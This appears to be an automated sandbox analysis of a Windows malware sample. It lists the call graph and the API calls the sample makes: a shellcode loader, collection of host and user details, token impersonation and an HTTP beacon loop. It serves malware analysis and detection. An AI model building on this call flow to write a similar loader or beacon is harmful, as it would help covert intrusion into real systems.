                            execution_graph 39864 4013c1 39865 4013c8 39864->39865 39866 4011da 39865->39866 39867 4013db _amsg_exit 39865->39867 39870 401460 _initterm 39866->39870 39871 4011e7 39866->39871 39868 4013f5 _initterm 39867->39868 39869 4011ff 39867->39869 39868->39869 39890 401e20 39869->39890 39872 401483 exit 39870->39872 39871->39868 39871->39869 39875 401231 SetUnhandledExceptionFilter 39876 401252 39875->39876 39877 401257 __p__acmdln 39876->39877 39881 40126e malloc 39877->39881 39879 401301 39880 401310 strlen malloc memcpy 39879->39880 39880->39880 39882 401346 39880->39882 39881->39872 39881->39879 39905 401960 39882->39905 39884 40135f 39910 4029e0 39884->39910 39892 401e40 39890->39892 39897 401e35 39890->39897 39891 402030 39893 402041 39891->39893 39891->39897 39892->39891 39894 402082 39892->39894 39892->39897 39901 401ed0 39892->39901 39904 401fa0 39892->39904 39899 401f9d 39893->39899 39916 401ce0 11 API calls 39893->39916 39917 401c80 11 API calls 39894->39917 39897->39875 39898 402092 39898->39875 39899->39904 39900 401ce0 11 API calls 39900->39901 39901->39891 39901->39892 39901->39899 39901->39900 39915 401c80 11 API calls 39901->39915 39903 401fd2 VirtualProtect 39903->39904 39904->39897 39904->39903 39906 401969 39905->39906 39907 401900 39905->39907 39906->39884 39907->39907 39918 4014e0 _onexit 39907->39918 39909 401930 39909->39884 39911 401960 _onexit 39910->39911 39912 4029f6 39911->39912 39919 401805 GetTickCount sprintf CreateThread 39912->39919 39915->39892 39916->39893 39917->39898 39918->39909 39920 4016e1 39919->39920 39923 40161c CreateNamedPipeA 39920->39923 39924 401682 ConnectNamedPipe 39923->39924 39925 4016d9 39923->39925 39924->39925 39926 401699 39924->39926 39927 4016c4 CloseHandle 39926->39927 39928 40169d WriteFile 39926->39928 39927->39925 39928->39927 39929 4016d0 39928->39929 39929->39926 39930 d79cc0 39931 d79d1c 39930->39931 39933 d79d4a 39931->39933 39954 d79fa0 GetPEB 39931->39954 39940 d7a860 39933->39940 39935 d79da8 39944 d7a300 39935->39944 39937 d79e14 39948 dca5dc 39937->39948 39943 d7a880 39940->39943 39941 d7a937 VirtualAlloc 39942 d7a954 39941->39942 39942->39935 39943->39941 39943->39942 39947 d7a32f 39944->39947 39945 d7a468 39945->39937 39946 d7a35e LoadLibraryA 39946->39947 39947->39945 39947->39946 39949 dca5ec 39948->39949 39950 dca5e7 39948->39950 39955 dca4e6 39949->39955 39967 dd1da8 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 39950->39967 39953 d79e95 39954->39933 39956 dca4f2 __setmbcp 39955->39956 39957 dca53f 39956->39957 39958 dca58f __setmbcp 39956->39958 39968 dca3b1 39956->39968 39957->39958 40017 dba802 39957->40017 39958->39953 39961 dca56f 39961->39958 39964 dca3b1 __CRT_INIT@12 154 API calls 39961->39964 39962 dca552 39962->39961 39963 dba802 ___DllMainCRTStartup 315 API calls 39962->39963 39965 dca566 39963->39965 39964->39958 39966 dca3b1 __CRT_INIT@12 154 API calls 39965->39966 39966->39961 39967->39949 39969 dca43c 39968->39969 39970 dca3c0 39968->39970 39972 dca442 39969->39972 39973 dca473 39969->39973 40037 dca68a HeapCreate 39970->40037 39977 dca3cb 39972->39977 39980 dca45d 39972->39980 40048 dc8f0a 67 API calls _doexit 39972->40048 39974 dca478 39973->39974 39975 dca4d1 39973->39975 40051 dcd5c6 TlsGetValue 39974->40051 39975->39977 40072 dcd8e0 79 API calls 2 library calls 39975->40072 39977->39957 39979 dca3d2 40039 dcd94e 76 API calls 8 library calls 39979->40039 39980->39977 40049 dd0145 68 API calls __setmbcp 39980->40049 39986 dca3d7 __RTC_Initialize 39993 dca3e7 GetCommandLineA 39986->39993 40010 dca3db 39986->40010 39988 dca489 39988->39977 40057 dcd54b 6 API calls __crt_waiting_on_module_handle 39988->40057 39989 dca467 40050 dcd5fa 7 API calls __decode_pointer 39989->40050 40041 dd1c71 76 API calls 3 library calls 39993->40041 39997 dca4a7 40001 dca4ae 39997->40001 40002 dca4c5 39997->40002 39998 dca3f7 40042 dcfef1 72 API calls 3 library calls 39998->40042 40000 dca401 40005 dca405 40000->40005 40044 dd1bb6 112 API calls 3 library calls 40000->40044 40058 dcd637 67 API calls 5 library calls 40001->40058 40059 dc8722 40002->40059 40043 dcd5fa 7 API calls __decode_pointer 40005->40043 40006 dca4b5 GetCurrentThreadId 40006->39977 40007 dca3e0 40007->39977 40040 dca6ba VirtualFree HeapFree HeapFree HeapDestroy 40010->40040 40011 dca411 40012 dca425 40011->40012 40045 dd193e 111 API calls 6 library calls 40011->40045 40012->40007 40047 dd0145 68 API calls __setmbcp 40012->40047 40015 dca41a 40015->40012 40046 dc8d2d 74 API calls 5 library calls 40015->40046 40018 dba8b0 40017->40018 40022 dba812 ___DllMainCRTStartup 40017->40022 40152 dbc35d 118 API calls 4 library calls 40018->40152 40020 dba817 ___DllMainCRTStartup 40020->39962 40021 dba8b8 40021->40020 40022->40020 40036 dba895 40022->40036 40148 dbdae1 GetCurrentProcess GetCurrentProcess VirtualQuery ___DllMainCRTStartup 40022->40148 40025 dba850 40026 dba85f 40025->40026 40027 dba897 40025->40027 40025->40036 40028 dba86b 40026->40028 40029 dba87c 40026->40029 40030 dba8a0 40027->40030 40027->40036 40031 dba873 HeapDestroy 40028->40031 40028->40036 40149 dbd492 GetCurrentProcess VirtualFree ___DllMainCRTStartup 40029->40149 40151 dbda6f GetCurrentProcess GetCurrentProcess UnmapViewOfFile ___DllMainCRTStartup 40030->40151 40031->40036 40034 dba887 40034->40036 40150 dbd492 GetCurrentProcess VirtualFree ___DllMainCRTStartup 40034->40150 40078 db131c 40036->40078 40038 dca3c6 40037->40038 40038->39977 40038->39979 40039->39986 40040->40007 40041->39998 40042->40000 40044->40011 40045->40015 40046->40012 40047->40005 40048->39980 40049->39989 40052 dcd5db 40051->40052 40053 dca47d 40051->40053 40073 dcd54b 6 API calls __crt_waiting_on_module_handle 40052->40073 40056 dd1852 67 API calls __calloc_impl 40053->40056 40055 dcd5e6 TlsSetValue 40055->40053 40056->39988 40057->39997 40058->40006 40061 dc872e __setmbcp 40059->40061 40060 dc87a7 _realloc __setmbcp 40060->40007 40061->40060 40062 dc876d 40061->40062 40074 dca8aa 67 API calls 2 library calls 40061->40074 40062->40060 40063 dc8782 HeapFree 40062->40063 40063->40060 40065 dc8794 40063->40065 40077 dca641 67 API calls __getptd_noexit 40065->40077 40067 dc8799 GetLastError 40067->40060 40068 dc8745 ___sbh_find_block 40071 dc875f 40068->40071 40075 dca90d VirtualFree VirtualFree HeapFree __VEC_memcpy ___sbh_free_block 40068->40075 40076 dc8778 LeaveCriticalSection _doexit 40071->40076 40072->39977 40073->40055 40074->40068 40075->40071 40076->40062 40077->40067 40153 db81bc 40078->40153 40080 db1332 ___DllMainCRTStartup 40160 dc87ff 40080->40160 40082 db13b7 ___DllMainCRTStartup 40178 dbcb1c 40082->40178 40088 db140b 40089 dbea37 ___DllMainCRTStartup 72 API calls 40088->40089 40090 db141d 40089->40090 40206 db386e 40090->40206 40092 db1425 40093 db1429 40092->40093 40095 db142e ___DllMainCRTStartup 40092->40095 40293 dbde47 85 API calls ___DllMainCRTStartup 40093->40293 40096 db1448 40095->40096 40097 db1443 40095->40097 40211 db38cc 40096->40211 40294 dbde47 85 API calls ___DllMainCRTStartup 40097->40294 40101 db1451 40295 dbde47 85 API calls ___DllMainCRTStartup 40101->40295 40102 db1456 40217 db3927 40102->40217 40106 db145f 40296 dbde47 85 API calls ___DllMainCRTStartup 40106->40296 40108 db1464 ___DllMainCRTStartup 40109 dc87ff _malloc 67 API calls 40108->40109 40110 db148b 40109->40110 40111 db149b ___DllMainCRTStartup 40110->40111 40112 db1496 40110->40112 40114 dbea37 ___DllMainCRTStartup 72 API calls 40111->40114 40297 dbde47 85 API calls ___DllMainCRTStartup 40112->40297 40115 db14ae ___DllMainCRTStartup 40114->40115 40229 db8060 GetACP GetOEMCP 40115->40229 40117 db16ac 40312 dbcea0 67 API calls __setmbcp 40117->40312 40118 dbcdfa 68 API calls ___DllMainCRTStartup 40141 db14c0 ___DllMainCRTStartup 40118->40141 40120 db16b5 40122 dc8722 __setmbcp 67 API calls 40120->40122 40121 dc8956 103 API calls __snprintf 40121->40141 40123 db16be 40122->40123 40313 dbde47 85 API calls ___DllMainCRTStartup 40123->40313 40125 db16c4 40125->40020 40133 db386e ___DllMainCRTStartup GetLocalTime 40133->40141 40138 db15c2 ___DllMainCRTStartup 40138->40141 40142 db386e ___DllMainCRTStartup GetLocalTime 40138->40142 40145 db2874 ___DllMainCRTStartup 3 API calls 40138->40145 40146 db273c ___DllMainCRTStartup 4 API calls 40138->40146 40301 db8fa1 156 API calls ___DllMainCRTStartup 40138->40301 40302 db4f55 138 API calls 2 library calls 40138->40302 40303 db7853 124 API calls ___DllMainCRTStartup 40138->40303 40304 db7017 131 API calls 4 library calls 40138->40304 40305 db2fb7 123 API calls ___DllMainCRTStartup 40138->40305 40306 db2962 113 API calls 3 library calls 40138->40306 40307 dbde47 85 API calls ___DllMainCRTStartup 40138->40307 40308 dbde47 85 API calls ___DllMainCRTStartup 40138->40308 40141->40117 40141->40118 40141->40121 40141->40133 40141->40138 40266 db273c 40141->40266 40275 db2e3d 40141->40275 40282 db2874 40141->40282 40285 db54a0 40141->40285 40298 db6072 67 API calls 7 library calls 40141->40298 40299 dbbcc5 124 API calls 4 library calls 40141->40299 40300 dba36c htonl htonl _memset ___DllMainCRTStartup 40141->40300 40309 db300f 40141->40309 40142->40138 40145->40138 40146->40138 40148->40025 40149->40034 40150->40036 40151->40036 40152->40021 40154 dc87ff _malloc 67 API calls 40153->40154 40155 db81c7 40154->40155 40156 dc87ff _malloc 67 API calls 40155->40156 40159 db81e4 _memset ___DllMainCRTStartup 40155->40159 40157 db81d7 40156->40157 40158 dc8722 __setmbcp 67 API calls 40157->40158 40157->40159 40158->40159 40159->40080 40161 dc88b2 40160->40161 40167 dc8811 40160->40167 40321 dcb77f 6 API calls __decode_pointer 40161->40321 40163 dc88b8 40322 dca641 67 API calls __getptd_noexit 40163->40322 40166 dc88aa 40166->40082 40167->40166 40170 dc8822 40167->40170 40171 dc886e RtlAllocateHeap 40167->40171 40173 dc889e 40167->40173 40176 dc88a3 40167->40176 40317 dc87b0 67 API calls 4 library calls 40167->40317 40318 dcb77f 6 API calls __decode_pointer 40167->40318 40170->40167 40314 dcb737 67 API calls 2 library calls 40170->40314 40315 dcb58c 67 API calls 7 library calls 40170->40315 40316 dc8cc2 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 40170->40316 40171->40167 40319 dca641 67 API calls __getptd_noexit 40173->40319 40320 dca641 67 API calls __getptd_noexit 40176->40320 40323 dc9e8e GetSystemTimeAsFileTime 40178->40323 40180 dbcb2d 40325 dc8c0a 40180->40325 40183 dc87ff _malloc 67 API calls 40184 dbcb76 _memset _realloc 40183->40184 40328 dca0d5 40184->40328 40186 dbcbe2 40188 dca0d5 _strtok 67 API calls 40186->40188 40187 dbcbb9 40187->40186 40189 dca0d5 _strtok 67 API calls 40187->40189 40190 db13f0 40188->40190 40189->40187 40191 db5c3e 40190->40191 40192 dc9e8e __time64 GetSystemTimeAsFileTime 40191->40192 40193 db5c50 40192->40193 40194 dc8c0a ___DllMainCRTStartup 67 API calls 40193->40194 40195 db5c57 ___DllMainCRTStartup 40194->40195 40366 db5cc4 40195->40366 40198 dbea37 40199 dbea50 40198->40199 40205 dbea63 _memset 40198->40205 40200 dbea59 40199->40200 40201 dbea65 40199->40201 40203 dc87ff _malloc 67 API calls 40200->40203 40377 dca196 72 API calls 8 library calls 40201->40377 40203->40205 40204 dbea72 40204->40205 40205->40088 40207 db387c ___DllMainCRTStartup 40206->40207 40208 db3882 GetLocalTime 40207->40208 40209 db3880 40207->40209 40210 db3894 ___DllMainCRTStartup 40208->40210 40209->40092 40210->40092 40212 db38d7 ___DllMainCRTStartup 40211->40212 40212->40212 40216 db144d 40212->40216 40378 dbc0d3 103 API calls ___DllMainCRTStartup 40212->40378 40214 db390f 40379 dbc0fd 103 API calls 4 library calls 40214->40379 40216->40101 40216->40102 40218 db393e ___DllMainCRTStartup 40217->40218 40219 db3980 htonl htonl 40218->40219 40220 db145b 40218->40220 40219->40220 40221 db39a0 40219->40221 40220->40106 40220->40108 40222 dc87ff _malloc 67 API calls 40221->40222 40223 db39a9 _realloc ___DllMainCRTStartup 40222->40223 40224 db39f3 _memset 40223->40224 40380 dbc0d3 103 API calls ___DllMainCRTStartup 40223->40380 40228 dc8722 __setmbcp 67 API calls 40224->40228 40226 db39e1 40381 dbc0fd 103 API calls 4 library calls 40226->40381 40228->40220 40382 dbefea 40229->40382 40234 dc8c0a ___DllMainCRTStartup 67 API calls 40235 db80b4 40234->40235 40394 db1311 40235->40394 40237 db80ba __RTC_InitBase 40238 db80cd 40237->40238 40239 db80d3 GetCurrentProcess 40237->40239 40397 dbe442 AllocateAndInitializeSid 40238->40397 40455 db4354 GetModuleHandleA GetProcAddress 40239->40455 40241 db80df 40241->40238 40245 db8103 40405 db242d 40245->40405 40248 db242d ___DllMainCRTStartup htonl 40249 db811f 40248->40249 40250 db242d ___DllMainCRTStartup htonl 40249->40250 40251 db812c 40250->40251 40409 db23de htonl 40251->40409 40254 db23de ___DllMainCRTStartup 2 API calls 40255 db8141 40254->40255 40412 db23fb 40255->40412 40263 db8162 _memset _realloc ___DllMainCRTStartup 40448 dbbf60 40263->40448 40265 db81a7 _memset 40265->40141 40595 dbdec2 40266->40595 40268 db2751 ___DllMainCRTStartup 40269 db27bf InternetOpenA 40268->40269 40270 db27cd InternetConnectA 40268->40270 40269->40270 40274 db281f ___DllMainCRTStartup 40270->40274 40598 dbdee3 40274->40598 40276 dbdec2 ___DllMainCRTStartup RevertToSelf 40275->40276 40277 db2e46 40276->40277 40601 db2c3f 40277->40601 40280 dbdee3 ___DllMainCRTStartup ImpersonateLoggedOnUser 40281 db2e5e 40280->40281 40281->40141 40283 dbdec2 ___DllMainCRTStartup RevertToSelf 40282->40283 40284 db287a InternetCloseHandle InternetCloseHandle 40283->40284 40287 db54ac ___DllMainCRTStartup 40285->40287 40286 db54f8 Sleep 40292 db54d5 40286->40292 40287->40286 40288 db54d0 40287->40288 40649 db5519 150 API calls 2 library calls 40287->40649 40650 db5657 77 API calls 2 library calls 40288->40650 40291 db54c7 40291->40286 40291->40288 40292->40141 40293->40095 40294->40096 40295->40102 40296->40108 40297->40111 40298->40141 40299->40141 40300->40141 40301->40138 40302->40138 40303->40138 40304->40138 40305->40138 40306->40138 40307->40141 40308->40141 40310 dbefea ___DllMainCRTStartup 5 API calls 40309->40310 40311 db301e 40310->40311 40311->40141 40312->40120 40313->40125 40314->40170 40315->40170 40317->40167 40318->40167 40319->40176 40320->40166 40321->40163 40322->40166 40324 dc9ebe __aulldiv 40323->40324 40324->40180 40333 dcd797 40325->40333 40329 dcd797 __getptd 67 API calls 40328->40329 40330 dca0f8 40329->40330 40357 dd0331 40330->40357 40332 dca194 40332->40187 40338 dcd71e GetLastError 40333->40338 40335 dcd79f 40337 dbcb33 40335->40337 40353 dc8c6e 67 API calls 3 library calls 40335->40353 40337->40183 40339 dcd5c6 ___set_flsgetvalue 8 API calls 40338->40339 40340 dcd735 40339->40340 40341 dcd73d 40340->40341 40342 dcd78b SetLastError 40340->40342 40354 dd1852 67 API calls __calloc_impl 40341->40354 40342->40335 40344 dcd749 40344->40342 40355 dcd54b 6 API calls __crt_waiting_on_module_handle 40344->40355 40346 dcd763 40347 dcd76a 40346->40347 40348 dcd782 40346->40348 40356 dcd637 67 API calls 5 library calls 40347->40356 40350 dc8722 __setmbcp 64 API calls 40348->40350 40351 dcd788 40350->40351 40351->40342 40352 dcd772 GetCurrentThreadId 40352->40342 40353->40337 40354->40344 40355->40346 40356->40352 40358 dd0339 40357->40358 40359 dd033b IsDebuggerPresent 40357->40359 40358->40332 40365 dd2865 40359->40365 40362 dd41bf SetUnhandledExceptionFilter UnhandledExceptionFilter 40363 dd41dc __invoke_watson 40362->40363 40364 dd41e4 GetCurrentProcess TerminateProcess 40362->40364 40363->40364 40364->40332 40365->40362 40367 db13f9 40366->40367 40368 db5cd6 ___DllMainCRTStartup 40366->40368 40367->40198 40375 db8293 htons 40368->40375 40370 dc87ff _malloc 67 API calls 40374 db5cee 40370->40374 40371 db8489 htons ___DllMainCRTStartup 40371->40374 40372 dbea37 ___DllMainCRTStartup 72 API calls 40372->40374 40374->40367 40374->40370 40374->40371 40374->40372 40376 db8293 htons 40374->40376 40375->40374 40376->40374 40377->40204 40378->40214 40379->40216 40380->40226 40381->40224 40456 dbef82 CryptAcquireContextA 40382->40456 40386 db8090 40387 dbbecf 40386->40387 40388 dbbee1 ___DllMainCRTStartup 40387->40388 40463 dc1270 40388->40463 40391 dbbefd ___DllMainCRTStartup 40393 db8099 GetCurrentProcessId GetTickCount 40391->40393 40469 dd7320 40391->40469 40474 dc8ede 67 API calls _doexit 40391->40474 40393->40234 40395 db300f ___DllMainCRTStartup 5 API calls 40394->40395 40396 db1316 40395->40396 40396->40237 40398 dbe482 CheckTokenMembership 40397->40398 40399 db80ed 40397->40399 40400 dbe497 FreeSid 40398->40400 40401 dbe494 40398->40401 40402 db23a9 40399->40402 40400->40399 40401->40400 40403 dd72d6 40402->40403 40404 db23b8 htonl 40403->40404 40404->40245 40406 db245e 40405->40406 40407 db243c _realloc 40405->40407 40406->40248 40408 db244a htonl 40407->40408 40408->40406 40410 db242d ___DllMainCRTStartup htonl 40409->40410 40411 db23f8 GetCurrentProcessId 40410->40411 40411->40254 40413 db2406 40412->40413 40414 db242d ___DllMainCRTStartup htonl 40413->40414 40415 db2418 40414->40415 40416 db241b 40415->40416 40417 db242d ___DllMainCRTStartup htonl 40416->40417 40418 db242a 40417->40418 40419 db7f09 40418->40419 40420 db81bc ___DllMainCRTStartup 67 API calls 40419->40420 40421 db7f1c ___DllMainCRTStartup 40420->40421 40422 db7f5e GetUserNameA GetComputerNameA 40421->40422 40476 db2f10 40422->40476 40425 db7fb9 GetVersionExA 40426 db241b ___DllMainCRTStartup htonl 40425->40426 40428 db7fd6 40426->40428 40427 db7f9c _strrchr 40427->40425 40429 db241b ___DllMainCRTStartup htonl 40428->40429 40430 db7fe1 40429->40430 40431 db23fb ___DllMainCRTStartup htonl 40430->40431 40432 db7fec 40431->40432 40433 db23de ___DllMainCRTStartup 2 API calls 40432->40433 40434 db7ff4 40433->40434 40435 db23de ___DllMainCRTStartup 2 API calls 40434->40435 40436 db8000 40435->40436 40437 db23de ___DllMainCRTStartup 2 API calls 40436->40437 40438 db800c 40437->40438 40439 db23de ___DllMainCRTStartup 2 API calls 40438->40439 40440 db8015 40439->40440 40479 dc8956 40440->40479 40443 db242d ___DllMainCRTStartup htonl 40444 db8051 40443->40444 40494 db8207 40444->40494 40447 db2468 htonl 40447->40263 40449 dbbf71 ___DllMainCRTStartup 40448->40449 40519 dc0cd9 40449->40519 40451 dbbf9d 40454 dbbfc8 40451->40454 40543 dc11a5 40451->40543 40547 dc8ede 67 API calls _doexit 40451->40547 40454->40265 40455->40241 40457 dbefab CryptAcquireContextA 40456->40457 40458 dbefc2 CryptGenRandom 40456->40458 40457->40458 40459 dbefbe 40457->40459 40460 dbefd7 CryptReleaseContext 40458->40460 40461 dbefe6 40458->40461 40459->40386 40462 dbef0c GetSystemTimeAsFileTime _clock 40459->40462 40460->40459 40461->40460 40462->40386 40465 dc127b ___DllMainCRTStartup 40463->40465 40464 dc128f 40464->40391 40465->40464 40466 dc87ff _malloc 67 API calls 40465->40466 40468 dc129e 40466->40468 40467 dc8722 __setmbcp 67 API calls 40467->40464 40468->40464 40468->40467 40472 dd7344 ___DllMainCRTStartup 40469->40472 40471 dd7b1f 40471->40391 40473 dd7960 40472->40473 40475 dd8df9 28 API calls _RTC_Failure 40472->40475 40473->40391 40474->40391 40475->40471 40500 db2f1b 40476->40500 40480 dc8966 40479->40480 40481 dc8983 40479->40481 40513 dca641 67 API calls __getptd_noexit 40480->40513 40483 dc89af 40481->40483 40485 dc8992 40481->40485 40517 dcb90b 103 API calls 15 library calls 40483->40517 40484 dc896b 40514 dcc5da 6 API calls 2 library calls 40484->40514 40515 dca641 67 API calls __getptd_noexit 40485->40515 40489 dc89dd 40491 db802d 40489->40491 40518 dcb7a7 101 API calls 6 library calls 40489->40518 40490 dc8997 40516 dcc5da 6 API calls 2 library calls 40490->40516 40491->40443 40495 db8215 ___DllMainCRTStartup 40494->40495 40496 dc8722 __setmbcp 67 API calls 40495->40496 40497 db821c 40496->40497 40498 dc8722 __setmbcp 67 API calls 40497->40498 40499 db805a 40498->40499 40499->40447 40507 db2e6e 40500->40507 40502 db2f36 WSASocketA 40503 db2f18 GetModuleFileNameA 40502->40503 40504 db2f50 WSAIoctl 40502->40504 40503->40427 40506 db2f74 closesocket 40504->40506 40506->40503 40508 db2e83 WSAStartup 40507->40508 40511 db2ea5 ___DllMainCRTStartup 40507->40511 40509 db2e99 WSACleanup 40508->40509 40508->40511 40512 dc8ede 67 API calls _doexit 40509->40512 40511->40502 40512->40511 40513->40484 40515->40490 40517->40489 40518->40491 40548 dc199b 40519->40548 40525 dc0dd8 40526 dc0e67 40525->40526 40530 dc0de3 40525->40530 40527 dc8722 __setmbcp 67 API calls 40526->40527 40528 dc0e6f 40527->40528 40561 dc1e70 67 API calls 3 library calls 40528->40561 40560 dc1e70 67 API calls 3 library calls 40530->40560 40532 dc0e85 40538 dc0f39 40532->40538 40539 dc0ea6 40532->40539 40542 dc0d49 ___DllMainCRTStartup 40532->40542 40533 dc0e41 40534 dc0e4e 40533->40534 40535 dc0e59 40533->40535 40536 dc8722 __setmbcp 67 API calls 40534->40536 40537 dc8722 __setmbcp 67 API calls 40535->40537 40536->40542 40537->40542 40538->40542 40563 dc1e70 67 API calls 3 library calls 40538->40563 40539->40542 40562 dc1e70 67 API calls 3 library calls 40539->40562 40542->40451 40544 dc11b5 ___DllMainCRTStartup 40543->40544 40546 dc11d6 40544->40546 40588 dc1f72 40544->40588 40546->40451 40547->40451 40549 dc19a9 40548->40549 40550 dc0d29 40548->40550 40549->40550 40564 dc3ef7 40549->40564 40550->40542 40552 dd6990 40550->40552 40567 dd611c 40552->40567 40554 dd69aa 40558 dc0d40 40554->40558 40580 dca641 67 API calls __getptd_noexit 40554->40580 40556 dd69bd 40556->40558 40581 dca641 67 API calls __getptd_noexit 40556->40581 40558->40542 40559 dc1a0c 5 API calls ___DllMainCRTStartup 40558->40559 40559->40525 40560->40533 40561->40532 40562->40542 40563->40542 40565 dc87ff _malloc 67 API calls 40564->40565 40566 dc3f03 40565->40566 40566->40549 40568 dd6128 __setmbcp 40567->40568 40569 dd615f _memset 40568->40569 40570 dd6140 40568->40570 40574 dd61d1 RtlAllocateHeap 40569->40574 40575 dd6155 __setmbcp 40569->40575 40584 dca8aa 67 API calls 2 library calls 40569->40584 40585 dcb0bc 5 API calls 2 library calls 40569->40585 40586 dd6218 LeaveCriticalSection _doexit 40569->40586 40587 dcb77f 6 API calls __decode_pointer 40569->40587 40582 dca641 67 API calls __getptd_noexit 40570->40582 40572 dd6145 40583 dcc5da 6 API calls 2 library calls 40572->40583 40574->40569 40575->40554 40580->40556 40581->40558 40582->40572 40584->40569 40585->40569 40586->40569 40587->40569 40589 dc1f7f ___DllMainCRTStartup 40588->40589 40590 dc1fa2 _realloc 40589->40590 40592 dc1165 40589->40592 40590->40546 40593 dbefea ___DllMainCRTStartup 5 API calls 40592->40593 40594 dc1173 40593->40594 40594->40590 40596 dbdecb RevertToSelf 40595->40596 40597 dbded1 40595->40597 40596->40597 40597->40268 40599 dbdeec ImpersonateLoggedOnUser 40598->40599 40600 db285d 40598->40600 40599->40600 40600->40141 40602 db2c85 _memset 40601->40602 40640 db9c49 40602->40640 40604 db2c95 40605 dc8956 __snprintf 103 API calls 40604->40605 40606 db2cac ___DllMainCRTStartup 40605->40606 40644 db95f6 40606->40644 40608 db2cce 40609 db2d01 40608->40609 40610 db5eec ___DllMainCRTStartup 103 API calls 40608->40610 40612 db2d2d 40609->40612 40613 db2d1d 40609->40613 40611 db2ceb 40610->40611 40614 db5fb6 ___DllMainCRTStartup 103 API calls 40611->40614 40616 dc8956 __snprintf 103 API calls 40612->40616 40615 dc8956 __snprintf 103 API calls 40613->40615 40614->40609 40617 db2d28 ___DllMainCRTStartup 40615->40617 40616->40617 40618 db2d62 HttpOpenRequestA 40617->40618 40619 db28bc ___DllMainCRTStartup InternetQueryOptionA InternetSetOptionA InternetSetStatusCallback 40618->40619 40620 db2d77 HttpSendRequestA 40619->40620 40622 db9cc6 ___DllMainCRTStartup 67 API calls 40620->40622 40623 db2da0 40622->40623 40624 db291b ___DllMainCRTStartup HttpQueryInfoA 40623->40624 40625 db2da6 40624->40625 40626 db2dab 40625->40626 40627 db2db9 InternetQueryDataAvailable 40625->40627 40628 db2dae InternetCloseHandle 40626->40628 40629 db2dca 40627->40629 40630 db2e2e InternetCloseHandle 40627->40630 40631 db2e38 40628->40631 40629->40630 40632 db2dd2 40629->40632 40630->40631 40631->40280 40632->40626 40632->40628 40633 db2ddb InternetReadFile 40632->40633 40634 db2e08 40633->40634 40635 db2df8 40633->40635 40634->40626 40636 db2e0d InternetCloseHandle 40634->40636 40635->40633 40635->40634 40637 db2e1f ___DllMainCRTStartup 40636->40637 40638 db9afe ___DllMainCRTStartup 68 API calls 40637->40638 40639 db2e2a 40638->40639 40639->40631 40641 db9c58 40640->40641 40642 db81bc ___DllMainCRTStartup 67 API calls 40641->40642 40643 db9c6f ___DllMainCRTStartup 40642->40643 40643->40604 40645 db961c _memset ___DllMainCRTStartup 40644->40645 40647 db9656 40645->40647 40648 db8250 htonl 40645->40648 40647->40647 40648->40645 40649->40291 40650->40292 40651 4017ac malloc 40652 4017c2 Sleep 40651->40652 40658 401700 CreateFileA 40652->40658 40655 4017e5 40663 40156c VirtualAlloc 40655->40663 40657 4017fe 40659 4017a4 40658->40659 40660 40175f 40658->40660 40659->40652 40659->40655 40661 401763 ReadFile 40660->40661 40662 40178a CloseHandle 40660->40662 40661->40660 40661->40662 40662->40659 40664 40159f 40663->40664 40665 4015c2 VirtualProtect CreateThread 40664->40665 40665->40657 40666 401530 40665->40666

                            Executed Functions

                            Function 00DB2C3F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 186networkfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • _memset.LIBCMT ref: 00DB2C80
                            • __snprintf.LIBCMT ref: 00DB2CA7
                              • Part of subcall function 00DB95F6: _memset.LIBCMT ref: 00DB9617
                            • __snprintf.LIBCMT ref: 00DB2D23
                            • __snprintf.LIBCMT ref: 00DB2D3A
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2D69
                            • HttpSendRequestA.WININET(00000000,?,?,00DB2E54,?), ref: 00DB2D92
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2DAF
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5EFC
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F08
                              • Part of subcall function 00DB5EEC: __snprintf.LIBCMT ref: 00DB5F59
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F90
                              • Part of subcall function 00DB5EEC: _memset.LIBCMT ref: 00DB5F9B
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FC6
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB5FB6: __snprintf.LIBCMT ref: 00DB602E
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB604C
                              • Part of subcall function 00DB5FB6: _memset.LIBCMT ref: 00DB6057
                            • InternetQueryDataAvailable.WININET(00000000,00DB158B,00000000,00000000), ref: 00DB2DC0
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00DB2DEE
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E0E
                            • InternetCloseHandle.WININET(00000000), ref: 00DB2E2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$Internet__snprintf$CloseHandle$HttpRequest$AvailableDataFileOpenQueryReadSend
                            • String ID: %s%s$*/*
                            • API String ID: 2172916581-856325523
                            • Opcode ID: a307bf958a50ea51b03ddb6392535589610dd15a020d1c8808cec29aba166382
                            • Instruction ID: b5d233cf7fad8aab5e8b8d5a585120e5f14a14f72ec0b6661b5db1504d37f184
                            • Opcode Fuzzy Hash: a307bf958a50ea51b03ddb6392535589610dd15a020d1c8808cec29aba166382
                            • Instruction Fuzzy Hash: 4E519D72900219FFDF11AFA5DC85EFEBBB9EB04310B04446AF516A7261DA309A45CBB4
                            Function 00DB2C3F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 186networkfileCOMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • _memset.LIBCMT ref: 00DB2C80
                            • __snprintf.LIBCMT ref: 00DB2CA7
                              • Part of subcall function 00DB95F6: _memset.LIBCMT ref: 00DB9617
                            • __snprintf.LIBCMT ref: 00DB2D23
                            • __snprintf.LIBCMT ref: 00DB2D3A
                            • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,00DE1540,00DEFFC4), ref: 00DB2D69
                            • HttpSendRequestA.WININET(00000000,?,?,00DB2E54,?), ref: 00DB2D92
